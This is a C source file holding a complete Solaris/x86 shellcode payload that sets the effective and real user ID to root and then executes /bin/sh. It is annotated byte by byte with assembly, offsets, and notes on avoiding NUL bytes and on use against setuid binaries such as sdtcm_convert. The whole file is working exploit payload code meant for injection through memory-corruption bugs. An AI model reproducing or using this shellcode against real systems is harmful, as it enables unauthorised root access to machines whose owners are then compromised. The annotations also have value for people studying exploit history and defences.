/*
 * Solaris/x86 setuid + execve shellcode ("anathema"), 108 bytes.
 *
 * Runs seteuid(0); setuid(0); execve("/bin/sh", argv, envp) with
 * argv == envp == { "/bin/sh", NULL }.  Both uid calls precede the
 * execve because:
 *   - Solaris' /bin/sh drops privileges when ruid != euid, hence setuid(0);
 *   - a few stock Sol/x86 setuid binaries (e.g. sdtcm_convert) drop euid
 *     to the caller's before the vulnerable code is reached, hence the
 *     preceding seteuid(0).
 *
 * Mechanics (offsets below are from the start of the array):
 *   - Every system call goes through a far call (opcode 0x9a).  Its
 *     operands, the argv slots and the string terminator are stored as
 *     NON-ZERO placeholder bytes and zeroed at run time through
 *     %esi-relative writes, so the payload itself contains no 0x00 byte.
 *   - %esi is recovered with the call/pop trick: `call` pushes the
 *     address of the byte following it, `popl %esi` pops it.
 *   - The syscall number is loaded into %al and arguments are pushed
 *     right to left.  The first two far calls are reached with a near
 *     `call`, which leaves a return address on top of the argument; the
 *     execve path pushes %eax into that position and jumps instead.
 *
 * Because the code patches its own bytes, it only works when placed in
 * memory that is both writable and executable.  Quite old; could be
 * shortened considerably.  Origin: www.hack.co.za [11 August 2000].
 */
char c0de[] =
    /* 0x00: main -- skip the far-call stub */
    "\xeb\x0a"                          /* jmp   0x0c (initcall) */
    /* 0x02: initlcall -- far call shared by seteuid/setuid.  Bytes
     * 0x03..0x06 and 0x08 are placeholders, zeroed below, which turns
     * this into lcall $0x7, $0x0 */
    "\x9a\x01\x02\x03\x5c\x07\x04"      /* lcall $0x0407, $0x5c030201 (pre-patch) */
    "\xc3"                              /* ret */
    /* 0x0a: jmpz */
    "\xeb\x05"                          /* jmp   0x11 (setuidcode) */
    /* 0x0c: initcall -- pushes 0x11, lands on jmpz */
    "\xe8\xf9\xff\xff\xff"              /* call  0x0a (jmpz) */
    /* 0x11: setuidcode -- %esi = 0x11 */
    "\x5e"                              /* popl  %esi */
    "\x29\xc0"                          /* subl  %eax, %eax */
    "\x88\x46\xf7"                      /* movb  %al, -0x09(%esi)  -> 0x08: selector high byte = 0 */
    "\x89\x46\xf2"                      /* movl  %eax, -0x0e(%esi) -> 0x03..0x06: far-call offset = 0 */
    /* seteuid(0) */
    "\x50"                              /* pushl %eax              uid 0 */
    "\xb0\x8d"                          /* movb  $0x8d, %al        seteuid */
    "\xe8\xe0\xff\xff\xff"              /* call  0x02 (initlcall) */
    /* setuid(0) */
    "\x29\xc0"                          /* subl  %eax, %eax */
    "\x50"                              /* pushl %eax              uid 0 */
    "\xb0\x17"                          /* movb  $0x17, %al        setuid */
    "\xe8\xd6\xff\xff\xff"              /* call  0x02 (initlcall) */
    "\xeb\x1f"                          /* jmp   0x4d (callz) */
    /* 0x2e: start -- %esi = 0x52, the address of "/bin/sh" */
    "\x5e"                              /* popl  %esi */
    "\x8d\x1e"                          /* leal  (%esi), %ebx      ebx = &"/bin/sh" */
    "\x89\x5e\x0b"                      /* movl  %ebx, 0x0b(%esi)  -> 0x5d: argv[0] = &"/bin/sh" */
    "\x29\xc0"                          /* subl  %eax, %eax */
    "\x88\x46\x19"                      /* movb  %al, 0x19(%esi)   -> 0x6b: selector high byte = 0 */
    "\x89\x46\x14"                      /* movl  %eax, 0x14(%esi)  -> 0x66..0x69: far-call offset = 0 */
    "\x89\x46\x0f"                      /* movl  %eax, 0x0f(%esi)  -> 0x61: argv[1] = NULL */
    "\x89\x46\x07"                      /* movl  %eax, 0x07(%esi)  -> 0x59: NUL-terminates "/bin/sh" */
    "\xb0\x3b"                          /* movb  $0x3b, %al        execve */
    "\x8d\x4e\x0b"                      /* leal  0x0b(%esi), %ecx  ecx = argv */
    "\x51"                              /* pushl %ecx              envp (same table as argv) */
    "\x51"                              /* pushl %ecx              argv */
    "\x53"                              /* pushl %ebx              path */
    "\x50"                              /* pushl %eax              fills the return-address slot */
    "\xeb\x18"                          /* jmp   0x65 (lcall) */
    /* 0x4d: callz -- pushes 0x52, lands on start */
    "\xe8\xdc\xff\xff\xff"              /* call  0x2e (start) */
    /* 0x52: data -- path string followed by the argv table; every byte
     * is non-zero until patched at run time */
    "\x2f\x62\x69\x6e\x2f\x73\x68"      /* "/bin/sh" (terminator written to 0x59) */
    "\x01\x01\x01\x01"                  /* 0x59: becomes 00 00 00 00 (string terminator) */
    "\x02\x02\x02\x02"                  /* 0x5d: becomes argv[0] */
    "\x03\x03\x03\x03"                  /* 0x61: becomes argv[1] = NULL */
    /* 0x65: lcall -- execve's far call, patched the same way as initlcall */
    "\x9a\x04\x04\x04\x04\x07\x04";     /* lcall $0x0407, $0x04040404 (pre-patch) */